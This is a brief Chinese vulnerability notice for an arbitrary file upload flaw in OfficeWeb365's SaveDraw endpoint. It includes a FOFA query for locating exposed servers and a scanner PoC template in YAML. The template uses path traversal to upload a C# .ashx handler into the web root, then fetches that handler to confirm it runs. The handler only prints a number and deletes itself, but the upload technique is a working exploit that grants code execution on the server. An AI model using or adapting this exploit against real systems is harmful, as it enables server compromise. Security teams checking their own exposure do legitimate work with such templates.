漏洞描述
OfficeWeb365 SaveDraw 接口存在任意文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限
FOFA: "OfficeWeb365"
officeweb365-savedraw-fileupload: OfficeWeb365 SaveDraw 任意文件上传漏洞
PoC代码[已公开]
id: officeweb365-savedraw-fileupload
info:
name: OfficeWeb365 SaveDraw 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
OfficeWeb365 SaveDraw 接口存在任意文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限
FOFA: "OfficeWeb365"
tags: officeweb365,fileupload
created: 2023/09/05
set:
r1: randomInt(1, 20)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rules:
r0:
request:
method: POST
path: /PW/SaveDraw?path=../../Content/img&idx={{r1}}.ashx
body: |
data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler
{
public void ProcessRequest(System.Web.HttpContext context)
{
System.Web.HttpResponse response = context.Response;
response.Write({{r2}} * {{r3}});
string filePath = context.Server.MapPath("/") + context.Request.Path;
if (System.IO.File.Exists(filePath))
{
System.IO.File.Delete(filePath);
}
}
public bool IsReusable
{
get { return false; }
}
}///---
expression: response.status == 200 && response.body == b"ok"
r1:
request:
method: GET
path: /Content/img/UserDraw/drawPW{{r1}}.ashx
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()